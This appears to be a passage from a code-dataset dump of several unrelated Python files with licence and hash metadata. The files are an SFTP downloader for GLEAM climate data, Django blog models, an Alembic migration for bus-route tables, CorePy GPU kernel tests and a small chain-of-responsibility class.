DC.Save_as_tiff(name=output_file, data=dataCor, geo=geo_in, projection="WGS84")
return True
def Collect_data(FTPprefix,Years,output_folder, Waitbar):
'''
This function downloads all the needed GLEAM files from hydras.ugent.be as a nc file.
Keywords arguments:
FTPprefix -- FTP path to the GLEAM data
Date -- 'yyyy-mm-dd'
output_folder -- 'C:/file/to/path/'
'''
# account of the SFTP server (only password is missing)
server='hydras.ugent.be'
portnumber=2225
username, password = WebAccounts.Accounts(Type='GLEAM')
# Create Waitbar
print '\nDownload GLEAM data'
if Waitbar == 1:
import wa.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount2 = len(Years)
amount2 = 0
WaitbarConsole.printWaitBar(amount2, total_amount2, prefix = 'Progress:', suffix = 'Complete', length = 50)
for year in Years:
directory = os.path.join(FTPprefix, '%d' %year)
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server, port=portnumber, username=username, password=password)
ftp=ssh.open_sftp()
ftp.chdir(directory)
filename='E_' + str(year) + '_GLEAM_v3.1b.nc'
local_filename = os.path.join(output_folder, filename)
if not os.path.exists(local_filename):
ftp.get(filename, local_filename)
if Waitbar == 1:
amount2 += 1
WaitbarConsole.printWaitBar(amount2, total_amount2, prefix = 'Progress:', suffix = 'Complete', length = 50)
ftp.close()
ssh.close()
return() | apache-2.0 | 4,973,839,900,364,555,000 | 32.828 | 121 | 0.607498 | false |
delacuesta13/Who-am-I | itsme/models.py | 1 | 4585 | from django.db import models
from django.contrib.auth.models import User
class UserProfile(models.Model):
user = models.ForeignKey(User, unique=True)
phone = models.CharField(max_length=100, blank=True)
location = models.CharField(max_length=100, blank=True)
profession = models.CharField(max_length=100, blank=True)
about = models.TextField(blank=True) # quick overview
resume = models.TextField(blank=True) # complete overview
available_for_work = models.BooleanField(default=True)
class Blog(models.Model):
user = models.ForeignKey(User, unique=True)
site_title = models.CharField(max_length=100, blank=True)
tagline = models.CharField(max_length=100, blank=True)
def __unicode__(self):
return self.site_title
class Category(models.Model):
user = models.ForeignKey(User)
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, blank=True)
description = models.TextField(blank=True)
type_category_choices = (
('work', 'Work'),
('blog', 'Blog'),
)
type_category = models.CharField(max_length=16, choices=type_category_choices)
def __unicode__(self):
return self.name
class Post(models.Model):
blog = models.ForeignKey(Blog)
categories = models.ManyToManyField(Category, through='CategoryRelationships')
date = models.DateTimeField(auto_now=False, auto_now_add=False)
title = models.TextField(blank=True)
slug = models.SlugField(max_length=100, unique=True, blank=True)
content = models.TextField(blank=True)
status_choices = (
('publish', 'Publish'),
('draft', 'Draft'),
('future', 'Schedule'),
)
status = models.CharField(max_length=16, choices=status_choices, default="publish")
allow_comments = models.BooleanField(default=True)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(null=True, auto_now=True, auto_now_add=False)
def __unicode__(self):
return self.title
def get_status(self):
status = self.status.lower()
if status == 'draft':
status = status.capitalize()
elif status == 'publish':
status = 'Published'
elif status == 'future':
status = 'Schudeled'
return status
class Comment(models.Model):
post = models.ForeignKey(Post)
user = models.ForeignKey(User, null=True, blank=True, on_delete=models.SET_NULL)
author = models.CharField(max_length=30)
email = models.EmailField(max_length=100)
url = models.URLField(blank=True)
ip = models.IPAddressField(max_length=100)
date = models.DateTimeField(auto_now=False, auto_now_add=True)
content = models.TextField()
is_moderate = models.BooleanField(default=False)
is_safe = models.BooleanField(default=False) # if True, allow HTML code
class Project(models.Model):
user = models.ForeignKey(User)
categories = models.ManyToManyField(Category, through='CategoryRelationships')
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, blank=True)
description = models.TextField()
site_url = models.URLField(blank=True)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(null=True, auto_now=True, auto_now_add=False)
def __unicode_(self):
return self.name
class CategoryRelationships(models.Model):
category = models.ForeignKey(Category)
post = models.ForeignKey(Post, null=True, blank=True)
project = models.ForeignKey(Project, null=True, blank=True)
class Message(models.Model):
user = models.ForeignKey(User)
date = models.DateTimeField(auto_now=False, auto_now_add=True)
ip = models.IPAddressField(max_length=100, null=True, blank=True)
author = models.CharField(max_length=100, null=True, blank=True)
email = models.EmailField(max_length=100, null=True, blank=True)
subject = models.CharField(max_length=100, null=True, blank=True)
content = models.TextField(null=True, blank=True)
is_readed = models.BooleanField(default=False)
class Upload(models.Model):
user = models.ForeignKey(User)
path = models.TextField(blank=True)
title = models.TextField(blank=True)
upload_date = models.DateTimeField(null=True, auto_now=False, auto_now_add=True)
extension_file = models.CharField(max_length=100, blank=True)
description = models.TextField(blank=True)
| gpl-3.0 | -7,769,707,275,793,938,000 | 40.306306 | 87 | 0.68506 | false |
steny138/PythonTaipeiOpendata | migrations/versions/3974d310ac43_.py | 1 | 3035 | """empty message
Revision ID: 3974d310ac43
Revises: edfc37a36914
Create Date: 2016-11-11 16:39:16.828429
"""
# revision identifiers, used by Alembic.
revision = '3974d310ac43'
down_revision = 'edfc37a36914'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('routes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('providerId', sa.Integer(), nullable=True),
sa.Column('providerName', sa.String(length=120), nullable=True),
sa.Column('routeName', sa.String(length=20), nullable=True),
sa.Column('pathAttributeId', sa.Integer(), nullable=True),
sa.Column('departure', sa.String(length=20), nullable=True),
sa.Column('destination', sa.String(length=20), nullable=True),
sa.Column('distance', sa.String(length=20), nullable=True),
sa.Column('goFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('backFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('goLastBusTime', sa.String(length=4), nullable=True),
sa.Column('backLastBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayGoFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayBackFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayGoLastBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayBackLastBusTime', sa.String(length=4), nullable=True),
sa.Column('segmentBuffer', sa.String(length=200), nullable=True),
sa.Column('ticketPriceDescription', sa.String(length=20), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('stops',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('routeId', sa.Integer(), nullable=True),
sa.Column('routeName', sa.String(length=200), nullable=True),
sa.Column('seqNo', sa.Integer(), nullable=True),
sa.Column('longitude', sa.String(length=50), nullable=True),
sa.Column('latitude', sa.String(length=50), nullable=True),
sa.Column('goBack', sa.String(length=2), nullable=True),
sa.Column('address', sa.String(length=200), nullable=True),
sa.Column('stopLocationId', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('chatid', sa.Integer(), nullable=True),
sa.Column('last_name', sa.String(length=120), nullable=True),
sa.Column('first_name', sa.String(length=120), nullable=True),
sa.Column('lat', sa.String(length=50), nullable=True),
sa.Column('lng', sa.String(length=50), nullable=True),
sa.Column('cmd', sa.String(length=1000), nullable=True),
sa.Column('bus_route', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('users')
op.drop_table('stops')
op.drop_table('routes')
### end Alembic commands ###
| apache-2.0 | 1,569,172,373,200,974,000 | 41.746479 | 77 | 0.685008 | false |
matthiaskramm/corepy | examples/cal/buffers.py | 1 | 3037 | import corepy.lib.extarray as extarray
import corepy.arch.cal.isa as cal
import corepy.arch.cal.types.registers as reg
import corepy.arch.cal.platform as env
def test_4comp():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
inp = proc.alloc_remote('i', 1, 4, 1)
out = proc.alloc_remote('i', 4, 1, 1)
for i in xrange(0, 4):
inp[i] = i + 1
out[i] = 0
print "inp", inp[0:4]
print "out", out[0:4]
cal.set_active_code(code)
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_resource(0, cal.pixtex_type.oned, cal.fmt.float, UNNORM=True) # positions
r_cnt = prgm.acquire_register()
r = prgm.acquire_registers(4)
cal.mov(r_cnt, r_cnt('0000'))
for i in xrange(0, 4):
cal.sample(0, 0, r[i].x000, r_cnt.x)
cal.add(r_cnt, r_cnt, r_cnt('1111'))
cal.iadd(r[0], r[0], r[1]('0x00'))
cal.iadd(r[0], r[0], r[2]('00x0'))
cal.iadd(r[0], r[0], r[3]('000x'))
cal.iadd(r[0], r[0], r[0])
cal.mov(reg.o0, r[0])
prgm.set_binding(reg.i0, inp)
prgm.set_binding(reg.o0, out)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 1, 1))
print "inp", inp[0:4]
print "out", out[0:4]
for i in xrange(0, 4):
assert(out[i] == (i + 1) * 2)
return
def test_1comp():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
inp = proc.alloc_remote('i', 4, 1, 1)
out = proc.alloc_remote('i', 1, 4, 1)
for i in xrange(0, 4):
inp[i] = i + 1
out[i] = 0
print "inp", inp[0:4]
print "out", out[0:4]
cal.set_active_code(code)
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_resource(0, cal.pixtex_type.oned, cal.fmt.float, UNNORM=True) # positions
r = prgm.acquire_register()
cal.sample(0, 0, r.x000, r('0000'))
#cal.iadd(r[0], r[0], r[1]('0x00'))
#cal.iadd(r[0], r[0], r[2]('00x0'))
#cal.iadd(r[0], r[0], r[3]('000x'))
cal.iadd(r, r, r)
cal.mov(reg.o0.x, r)
prgm.set_binding(reg.i0, inp)
prgm.set_binding(reg.o0, out)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 4, 1))
print "inp", inp[0:4]
print "out", out[0:4]
for i in xrange(0, 4):
assert(out[i] == 2)
return
def test_foo():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
cal.set_active_code(code)
cb = proc.alloc_remote('i', 1, 4, 1)
out = proc.alloc_remote('i', 4, 1, 1)
gb = proc.alloc_remote('i', 1, 4, 1, True)
for i in xrange(0, 4):
cb[i] = i + 1
out[i] = 42
gb[i] = 67
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_cb('cb0[4]')
cal.mov('r0', 'cb0[0]')
cal.mov('r1', 'cb0[1]')
#cal.mov('r2', 'cb0[2]')
#cal.mov('r3', 'cb0[3]')
cal.mov('o0', 'r0')
cal.mov('g[0]', 'r0')
prgm.set_binding('cb0', cb)
prgm.set_binding('o0', out)
prgm.set_binding('g[]', gb)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 1, 1))
print "cb ", cb[0:4]
print "out", out[0:4]
print "gb ", gb[0:4]
return
if __name__ == '__main__':
test_4comp()
test_1comp()
test_foo()
| bsd-3-clause | 7,764,453,063,671,404,000 | 19.38255 | 83 | 0.575568 | false |
mcfongtw/MkConfig | mkconfig/core/chain.py | 1 | 1494 | import logging
logger = logging.getLogger(__name__)
class ChainOfTransfiguration(object):
"""
A chain of responsibility implementation that channel through a series of transifgurations. One may depend
on previous step with respect to Context
"""
_chain = []
_context = {}
def __init__(self):
self._chain = []
self._context = {}
def add(self, transfiguration):
"""
Add a transfiguration into the chain of execution.
:param transfiguration: a transfiguration to be added
"""
self._chain.append(transfiguration)
logger.debug('Add transfiguration : [%s] to chain', transfiguration.__class__)
def get(self, index):
"""
Retrieve a transifguration in the chain at position [index]
:param index: index from 0 to size-of-chain
:return: the transfiguration at chain[index]
"""
return self._chain[index]
def size(self):
"""
Retrieve the # of transigurations in chain.
:return: length of chain
"""
return len(self._chain)
def execute(self, context = None):
"""
Perform execution of transfiguration one-by-one in the chain
:param context: a map of key-value attributes to perform
"""
for transfiguration in self._chain :
logger.info("Performing Transfiguration [%s]", transfiguration.__class__)
transfiguration.perform(context)
| mit | -3,838,645,005,129,700,400 | 24.322034 | 110 | 0.609103 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.